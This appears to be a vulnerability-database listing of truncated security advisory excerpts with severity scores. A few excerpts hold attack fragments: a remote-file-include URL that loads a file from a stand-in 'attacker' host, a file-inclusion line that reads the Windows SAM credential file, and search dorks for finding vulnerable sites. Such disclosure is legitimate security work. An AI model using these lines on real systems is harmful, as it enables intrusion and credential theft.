Securityvulns: Most viewed

47153 matches found

securityvulns
added 2014/12/01 12:0 a.m. | 135 views

[ MDVSA-2014:228 ] phpmyadmin

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Mandriva Linux Security Advisory MDVSA-2014:228 http://www.mandriva.com/en/support/security/ Package : phpmyadmin Date : November 26, 2014 Affected: Business Server 1.0 Problem Description: Multiple vulnerabilities have been discovered and corrected in...

CVSS: 6.5 | AI score: 6.6 | EPSS: 0.02725
Exploits: 3

securityvulns
added 2013/09/09 12:0 a.m. | 135 views

[SECURITY] [DSA 2740-1] python-django security update

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 - ------------------------------------------------------------------------- Debian Security Advisory DSA-2740-1 [email protected] http://www.debian.org/security/ Salvatore Bonaccorso August 23, 2013 http://www.debian.org/security/faq -...

AI score: 1.5
Exploits: 0

securityvulns
added 2013/04/08 12:0 a.m. | 135 views

SEC Consult SA-20130403-0 :: Multiple vulnerabilities in Sophos Web Protection Appliance

SEC Consult Vulnerability Lab Security Advisory 20130403-0 ======================================================================= title: Multiple vulnerabilities product: Sophos Web Protection Appliance vulnerable version: = 3.7.8.1 fixed version: 3.7.8.2 impact: Critical CVE number:...

CVSS: 9.3 | AI score: 1 | EPSS: 0.7099
Exploits: 12

securityvulns
added 2012/07/09 12:0 a.m. | 135 views

Bookmark4U lostpasswd.php env[include_prefix] Parameter RFI

vendor - http://bookmark4u.sourceforge.net/ version - 2.1 solution - product discontinued example - http://target/bookmark4u/lostpasswd.php?env5Bincludeprefix5D=http://attacker/path/to/file.txt???...

AI score: 1
Exploits: 0

securityvulns
added 2010/03/11 12:0 a.m. | 135 views

[XSS] i found a xss on "page" parameter in "eccredit.php" in Dvbbs < 8.3.0

Home Page : http://www.dvbbs.net/ Dvbbs is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the...

AI score: 0.7
Exploits: 0

securityvulns
added 2008/06/19 12:0 a.m. | 135 views

CA ARCserve Backup Discovery Service Denial of Service Vulnerability

Title: CA ARCserve Backup Discovery Service Denial of Service Vulnerability CA Advisory Date: 2008-06-17 Reported By: Luigi Auriemma Impact: A remote attacker can cause a denial of service. Summary: CA ARCserve Backup contains a vulnerability in the Discovery service casdscsvc that can allow a...

CVSS: 5 | AI score: 6.3 | EPSS: 0.03634
Exploits: 1

securityvulns
added 2008/04/15 12:0 a.m. | 135 views

S21SEC-043-en:Cezanne SW Blind SQL Injection

S21Sec Advisory - Title: Cezanne SW login required Blind SQL Injection ID: S21SEC-043-en Severity: High History: 02.Jan.2008 Vulnerability discovered Authors: Juan de la Fuente Costa [email protected] Fco Javier Puerta Rubio [email protected] URL: http://www.s21sec.com/avisos/s21sec-43-en.txt...

Exploits: 0

securityvulns
added 2007/05/02 12:0 a.m. | 135 views

Sendcard (sendcard.php) Sendcard Local File Inclusion Vulnerability

Sendcard sendcard.php Sendcard Local File Inclusion Vulnerability Discovered: ettee Dork: "Powered by sendcard - an advanced PHP e-card program" -site:sendcard.org "powered by Sendcard" Bug: "// Get the template details if!isset$form || $form == '' $form = "form"; if!isset$des || $des == '' $des ...

AI score: 7.2
Exploits: 0

securityvulns
added 2007/02/21 12:0 a.m. | 135 views

[Full-disclosure] Blind sql injection attack in INSERT syntax on PHP-nuke <=8.0 Final

Hello, it is my new advisory: Problem:Blind sql injection attack in INSERT syntax Product:PHP-nuke =8.0 Web page:http://phpnuke.org/ Credit:Maciej krasza Kukla @mail:[email protected] homepage:www.krasza.int.pl 1.Description ...PHP-Nuke 8.0 Final version. This version includes a new anti-flood...

AI score: 0.1
Exploits: 0

securityvulns
added 2007/02/05 12:0 a.m. | 135 views

flashChat 4.7.8 Cross Site Scripting Vulnerability

/ Flashchat 4.7.8 / Date of written Advisory: February 04, 2007 Product: Flash Chat = 4.7.8 Vendor: http://tufat.com/ Description: flashChat is a highly customizable PHP/MySQL based chat room script that is easily integrated into a website and mimics IRC in its command structure Exploits /...

AI score: 6.9
Exploits: 0

securityvulns
added 2006/11/22 12:0 a.m. | 135 views

Etomite CMS 0.6.1.2 Vulnerabilities + ContenNow 1.39 Vulnerabilities + Exploits

Etomite CMS 0.6.1.2 Multiple Vulnerabilities Severity : Medium risk Vendor : www.etomite.org Author : Alfredo Pesoli 'revenge' Secunia Advisory : SA22885 Security Focus BID : 21135 -------------------------------------------------- Description Etomite is a PHP Content Management System, more info...

AI score: 0.1
Exploits: 0

securityvulns
added 2006/11/03 12:0 a.m. | 135 views

[SA22676] Sun Solaris NVIDIA Graphics Driver Buffer Overflow Vulnerability

TITLE: Sun Solaris NVIDIA Graphics Driver Buffer Overflow Vulnerability SECUNIA ADVISORY ID: SA22676 VERIFY ADVISORY: http://secunia.com/advisories/22676/ CRITICAL: Highly critical IMPACT: Privilege escalation, DoS, System access WHERE: From remote OPERATING SYSTEM: Sun Solaris 10...

AI score: 1.4
Exploits: 0

securityvulns
added 2005/02/14 12:0 a.m. | 135 views

Infostring crash and shutdown in the Quake 3 engine

Luigi Auriemma Application: Quake 3 engine http://www.idsoftware.com Games: - Call of Duty = 1.5 - Call of Duty: United Offensive = 1.51 - Heavy Metal: F.A.K.K.2 = 1.02 - Quake III Arena = 1.32 - Return to Castle Wolfenstein = 1.41 - Soldier of Fortune II: Double Helix = 1.03 - Star Trek Voyager:...

AI score: 0.6
Exploits: 0

securityvulns
added 2003/06/21 12:0 a.m. | 135 views

phpMyAdmin XSS Vulnerabilities, Transversal Directory Attack , Information Encoding Weakness and Path Disclosures

phpMyAdmin XSS Vulnerabilities, Transversal Directory Attack , Information Encoding Weakness and Path Disclosures -------------------- Product: phpMyAdmin Vendor: phpMyAdmin Development Team Versions: VULNERABLE - 2.5.2 CVS in Development - 2.5.x - 2.4.x - 2.3.x - 2.2.x - 2.1.x - 2.0.x - 1.x.x NO...

AI score: 7.2
Exploits: 0

securityvulns
added 2002/10/04 12:0 a.m. | 135 views

SSL protection bypass in Ximian Evolution

Insufficient certificate check on restored connection...

AI score: 3.9
Exploits: 0 | References: 1 | Affected Software: 1

securityvulns
added 2001/06/22 12:0 a.m. | 135 views

A-FTP Anonymous FTP Server Remote DoS attack Vulnerability

A-FTP Anonymous FTP Server Remote DoS attack Vulnerability Cartel Advisory Code: CART-0102 Vendor Affected: A-FTP Server - Eirik Helgeland [email protected] / [email protected] What It Is from the author: A free Unix Compatible Anonymous FTP server, running hidden from the user. Can be starte...

AI score: 8
Exploits: 0

securityvulns
added 2000/07/21 12:0 a.m. | 135 views

Security Update: DoS on gpm

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Caldera Systems, Inc. Security Advisory Subject: DoS on gpm Advisory number: CSSA-2000-024.0 Issue date: 2000 July, 6 Cross reference: 1. Problem Description There are security problems within gpm General Purpose Mouse support daemon which allow remov...

AI score: 0.3
Exploits: 0

securityvulns
added 2015/10/05 12:0 a.m. | 134 views

[SYSS-2015-005] Kaspersky Total Security - Authentication Bypass

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2015-005 Product: Kaspersky Total Security KTS Vendor: Kaspersky Lab ZAO Affected Versions: 15.0.1.415 Tested Versions: 15.0.1.415 Vulnerability Type: Authentication Bypass Using an Alternate Path or Channel CWE-288 Risk Level:...

AI score: 7.1
Exploits: 0

securityvulns
added 2015/10/05 12:0 a.m. | 134 views

APPLE-SA-2015-09-21-1 watchOS 2

APPLE-SA-2015-09-21-1 watchOS 2 watchOS 2 is now available and addresses the following: Apple Pay Available for: Apple Watch Sport, Apple Watch, and Apple Watch Edition Impact: Some cards may allow a terminal to retrieve limited recent transaction information when making a payment Description: Th...

CVSS: 10 | AI score: 0.6 | EPSS: 0.2447
Exploits: 6

securityvulns
added 2015/07/27 12:0 a.m. | 134 views

libuser / userhelper security vulnerabilities

Unsafe files handling, insufficient characters filtering...

CVSS: 7.2 | AI score: 2.7 | EPSS: 0.06853
Exploits: 10 | References: 1

securityvulns
added 2014/06/17 12:0 a.m. | 134 views

[SE-2014-01] Security vulnerabilities in Oracle Database Java VM

Hello All, Security Explorations discovered multiple security issues in the implementation of a Java VM embedded in Oracle Database software 1. Discovered security issues violate many "Secure Coding Guidelines for the Java Programming Language" 2. Most of them demonstrate a well known problem...

Exploits: 0

securityvulns
added 2014/03/02 12:0 a.m. | 134 views

[slackware-security] subversion (SSA:2014-058-01)

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 slackware-security subversion SSA:2014-058-01 New subversion packages are available for Slackware 14.0, 14.1, and -current to fix denial-of-service issues. Here are the details from the Slackware 14.1 ChangeLog: +--------------------------+...

CVSS: 4.3 | AI score: 8.4 | EPSS: 0.11052
Exploits: 0

securityvulns
added 2013/10/13 12:0 a.m. | 134 views

Wordpress Cart66 Plugin 1.5.1.14 Multiple Vulnerabilities

Exploit Title: Wordpress Cart66 Plugin 1.5.1.14 Multiple Vulnerabilities Exploit Author: absane Blog: http://blog.noobroot.com Discovery date: September 29th 2013 Vendor notified: September 29th 2013 Vendor fixed: October 2 2013 Vendor Homepage: http://cart66.com Software Link:...

CVSS: 6.8 | AI score: 0.3 | EPSS: 0.04084
Exploits: 7

securityvulns
added 2013/06/17 12:0 a.m. | 134 views

APPLE-SA-2013-06-04-1 OS X Mountain Lion v10.8.4 and Security Update 2013-002

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 APPLE-SA-2013-06-04-1 OS X Mountain Lion v10.8.4 and Security Update 2013-002 OS X Mountain Lion v10.8.4 and Security Update 2013-002 is now available and addresses the following: CFNetwork Available for: OS X Mountain Lion v10.8 to v10.8.3 Impact: An...

CVSS: 10 | AI score: 0.2 | EPSS: 0.98582
Exploits: 31

securityvulns
added 2012/09/24 12:0 a.m. | 134 views

APPLE-SA-2012-09-19-1 iOS 6

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 APPLE-SA-2012-09-19-1 iOS 6 iOS 6 is now available and addresses the following: CFNetwork Available for: iPhone 3GS and later, iPod touch 4th generation and later, iPad 2 and later Impact: Visiting a maliciously crafted website may lead to the...

CVSS: 10 | AI score: 0.4 | EPSS: 0.73164
Exploits: 22

securityvulns
added 2012/07/23 12:0 a.m. | 134 views

DomsHttpd 1.0 <= Remote Denial Of Service

DomsHttpd 1.0 = Remote Denial Of Service Discovered by: Jean Pascal Pereira [email protected] About DomsHttpd: "A very simple HTTP protocol program base on asynchronous socket model." Vendor URI: http://domshttpd.codeplex.com/ The remote attacker has the possibility to crash the application by...

AI score: 1
Exploits: 0

securityvulns
added 2011/08/27 12:0 a.m. | 134 views

Warah Agencia (productos.php?categoria_id) Remote SQL injection Vulnerability

IRANIAN THE BEST HACKERS IN THE WORLD Remote SQL injection Vulnerability Warah Agencia productos.php?categoriaid AuTh0r : EhsanHp200 H0ME : www.ehsanhp.blogsky.com Email : [email protected] Vendor : http://www.warah.com.ar/ Persian Gulf 4 Ever! Dork : "DESIGN BY WARAH AGENCIA CREATIVA"...

AI score: 3.3
Exploits: 0

securityvulns
added 2011/05/05 12:0 a.m. | 134 views

[RT-SA-2011-004] Client Side Authorization ZyXEL ZyWALL USG Appliances Web Interface

Advisory: Client Side Authorization ZyXEL ZyWALL USG Appliances Web Interface The ZyXEL ZyWALL USG appliances perform parts of the authorization for their management web interface on the client side using JavaScript. By setting the JavaScript variable "isAdmin" to "true", a user with limited acce...

AI score: 1
Exploits: 0

securityvulns
added 2011/04/05 12:0 a.m. | 134 views

HTB22914: Local File Inclusion in UseBB

Vulnerability ID: HTB22914 Reference: http://www.htbridge.ch/advisory/localfileinclusioninusebb.html Product: UseBB Vendor: UseBB http://www.usebb.net/ Vulnerable Version: 1.0.11 Vendor Notification: 22 March 2011 Vulnerability Type: Local File Inclusion Risk level: Medium Credit: High-Tech Bridg...

AI score: 0.1
Exploits: 0

securityvulns
added 2011/02/15 12:0 a.m. | 134 views

R7-0038: Check Point Endpoint Security Server Information Disclosure

R7-0038: Check Point Endpoint Security Server Information Disclosure February 7, 2011 -- Vulnerability Details: The Check Point Endpoint Security Server and Integrity Server products inadvertently expose a number of private directories through the web interface. These directories include the SSL...

AI score: 0.1
Exploits: 0

securityvulns
added 2010/12/24 12:0 a.m. | 134 views

MyBB 1.6 <= SQL Injection Vulnerability

================================= MyBB 1.6 = SQL Injection Vulnerability ================================= 1. OVERVIEW Potential SQL Injection vulnerability was detected in MyBB. 2. APPLICATION DESCRIPTION MyBB is a free bulletin board system software package developed by the MyBB Group. It's...

Exploits: 0

securityvulns
added 2010/09/20 12:0 a.m. | 134 views

n.runs-SA-2010.001 - Alcatel-Lucent - unauthenticated administrative access to CTI CCA Server

n.runs AG http://www.nruns.com/ securityatnruns.com n.runs-SA-2010.001 20-September-2010 Vendor: Alcatel Affected Products: Versions before 9.0.8.4 of the CCAgent option of OmniTouch Contact Center Standard Edition Vulnerability: unauthenticated administrative access to CTI CCA Server Risk: High...

CVSS: 7.6 | AI score: 0.2 | EPSS: 0.01075
Exploits: 0

securityvulns
added 2010/06/25 12:0 a.m. | 134 views

Mozilla Foundation Security Advisory 2010-30

Mozilla Foundation Security Advisory 2010-30 Title: Integer Overflow in XSLT Node Sorting Impact: Critical Announced: June 22, 2010 Reporter: Martin Barbella Products: Firefox, Thunderbird, SeaMonkey Fixed in: Firefox 3.6.4 Firefox 3.5.10 Thunderbird 3.0.5 SeaMonkey 2.0.5 Description Security...

CVSS: 9.3 | AI score: 1.3 | EPSS: 0.11418
Exploits: 5

securityvulns
added 2010/05/28 12:0 a.m. | 134 views

PR10-02: Various XSS and information disclosure flaws within 3Com* iMC (Intelligent Management Center)

PR10-02: Various XSS and information disclosure flaws within 3Com iMC Intelligent Management Center On the 12th April 2010 Hewlett Packard completed its acquisition of 3Com Vulnerability found: 29th January 2010 Vendor informed: 1st February 2010 Vulnerability fixed: 13th May 2010 Severity:...

AI score: 7
Exploits: 0

securityvulns
added 2010/02/22 12:0 a.m. | 134 views

[SECURITY] [DSA-2002-1] New polipo packages fix denial of service

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------ Debian Security Advisory DSA-2002-1 [email protected] http://www.debian.org/security/ Stefan Fritsch February 19, 2010 http://www.debian.org/security/faq -...

CVSS: 10 | AI score: 0.2 | EPSS: 0.10066
Exploits: 1

securityvulns
added 2009/06/05 12:0 a.m. | 134 views

[SECURITY] CVE-2009-0580 UPDATED Apache Tomcat User enumeration vulnerability with FORM authentication

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Updated to clarify affected versions as they vary for each affected Realm. CVE-2009-0580: Tomcat information disclosure vulnerability Severity: Low Vendor: The Apache Software Foundation Versions Affected: MemoryRealm: Tomcat 4.1.0 to 4.1.39 Tomcat...

CVSS: 4.3 | AI score: 4.9 | EPSS: 0.9444
Exploits: 4

securityvulns
added 2009/01/09 12:0 a.m. | 134 views

FreeBSD Security Advisory FreeBSD-SA-09:01.lukemftpd

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ============================================================================= FreeBSD-SA-09:01.lukemftpd Security Advisory The FreeBSD Project Topic: Cross-site request forgery in lukemftpd8 Category: core Module: lukemftpd Announced: 2009-01-07...

CVSS: 7.5 | AI score: 6.2 | EPSS: 0.04045
Exploits: 1

securityvulns
added 2008/11/01 12:0 a.m. | 134 views

PHP-Nuke Module Current_Issue (summary&id) Remote SQL injection Vulnerability

IRANIAN THE BEST HACKERS IN THE WORLD Remote SQL injection Vulnerability PHP-Nuke Module CurrentIssue summary&id AuTh0r : EhsanHp200 H0ME : www.only-4dl.tk Email : [email protected] Dork : "inurl:modules.php?name=CurrentIssue" Exploite:...

AI score: 3.6
Exploits: 0

securityvulns
added 2008/03/26 12:0 a.m. | 134 views

Mozilla Foundation Security Advisory 2008-13

Mozilla Foundation Security Advisory 2008-13 Title: Multiple XSS vulnerabilities from character encoding Impact: Moderate Announced: March 25, 2008 Reporter: Alexey Proskuryakov, Yosuke Hasegawa, Simon Montagu Products: Firefox, Thunderbird, SeaMonkey Fixed in: Firefox 2.0.0.12 Thunderbird 2.0.0....

CVSS: 4.3 | AI score: 1.8 | EPSS: 0.0162
Exploits: 1

securityvulns
added 2007/12/05 12:0 a.m. | 134 views

Sql Injection in wordpress 2.3.1

Author : Beenu Arora Mail : [email protected] Application : WordPress 2.3.1 Homepage: http://wordpress.org/ SQL Injection Vulnerable URL : http://localhost/pathtowordpress/?feed=rss2&p= Parameter : P POC =...

AI score: 0.6
Exploits: 0

securityvulns
added 2007/07/23 12:0 a.m. | 134 views

Webspell 4.x Local File Inclusion

muH - $Title: Webspell 4.x Local File Inclusion Win $Damage Factor: Medium - High $Requires: Win Box & Php Supporting 00 $Discovered by muH $Usage: http://server.com/index.php?site=c:windowsrepairsam00...

AI score: 7.2
Exploits: 0

securityvulns
added 2006/12/26 12:0 a.m. | 134 views

PhpbbXtra v2.0 (phpbb_root_path) Remote File Include Vulnerability

----------------------------------------------- PhpbbXtra v2.0 phpbbrootpath Remote File Include Vulnerability ----------------------------------------------- Author: xoron ----------------------------------------------- Vuln Code: include$phpbbrootpath . 'includes/bbcode.'.$phpEx;...

AI score: 0.5
Exploits: 0

securityvulns
added 2006/10/13 12:0 a.m. | 134 views

zenphoto Multiple Path Disclosure and Cross Site Scripting Vulnerabilities

Vendor: zenphoto Vulnerable: zenphoto 1.0.2 beta and below The vendor has been warned and the vulnerabilities have been addressed in 1.0.3 beta. Path Disclosure --------------- http://www.example.com/photos/zen/i.php?a=EXISTINGALBUMNAME&i=EXISTINGIMAGENAME&s=thumb00 which returns: Warning:...

AI score: 0.3
Exploits: 0

securityvulns
added 2005/01/30 12:0 a.m. | 134 views

Microsoft Windows XP SP2 non-executable memory (DEP) protection bypass

By using small memory regions it's possible to place executable code into non-executable memory regions...

AI score: 3.1
Exploits: 0 | References: 1

securityvulns
added 2003/02/18 12:0 a.m. | 134 views

D-Forum (PHP)

Informations : °°°°°°°°°°°°°° Website : http://www.adalis.fr/adalis.html Versions : 1.00 - 1.11 Problem : Include file PHP Code/Location : °°°°°°°°°°°°°°°°°°° /includes/header.php3 : --------------------------- ?php if $myheader!="" include $myheader; else ? ... --------------------------...

AI score: 0.5
Exploits: 0

securityvulns
added 2000/12/22 12:0 a.m. | 134 views

Sample SecurID Token Emulator with Token Secret Import

Sample SecurID Token Emulator with Token Secret Import We have performed some cryptoanalysis and let's just say we do have grounds to believe that this algorithm is easily breakable. Once again, security of the cipher should be based entirely on the secrecy of the key, not the algorithm. Least...

AI score: 0.2
Exploits: 0

securityvulns
added 2015/07/13 12:0 a.m. | 133 views

[USN-2658-1] PHP vulnerabilities

========================================================================== Ubuntu Security Notice USN-2658-1 July 06, 2015 php5 vulnerabilities ========================================================================== A security issue affects these releases of Ubuntu and its derivatives: - Ubunt...

CVSS: 10 | AI score: 1.2 | EPSS: 0.50129
Exploits: 19

securityvulns
added 2015/07/05 12:0 a.m. | 133 views

CollabNet Subversion Edge downloadHook local file inclusion

Vuln Title: Local file inclusion in CollabNet Subversion Edge Management Frontend via logfile "filename" parameter of the "downloadHook" action Date: 28.06.2015 Author: otr Software Link: https://www.open.collab.net/downloads/svnedge Vendor: CollabNet Version: 4.0.11 Tested on: Fedora Linux Type:...

AI score: 1.2
Exploits: 0

securityvulns
added 2015/07/05 12:0 a.m. | 133 views

CollabNet Subversion Edge weak password policy

Vuln Title: The CollabNet Subversion Edge Management Frontend does not implement a strong password policy Date: 28.06.2015 Author: otr Software Link: https://www.open.collab.net/downloads/svnedge Vendor: CollabNet Version: 4.0.11 Tested on: Fedora Linux Type: Lack of defensive measures Risk: Medi...

AI score: 0.3
Exploits: 0

securityvulns
added 2015/05/13 12:0 a.m. | 133 views

Adobe Flash Player multiple security vulnerabilities

Buffer overflows, memory corruptions, integer overflows, race conditions, restriction bypass...

CVSS: 10 | AI score: 3.5 | EPSS: 0.87303
Exploits: 10 | Affected Software: 1

Total number of security vulnerabilities: 5000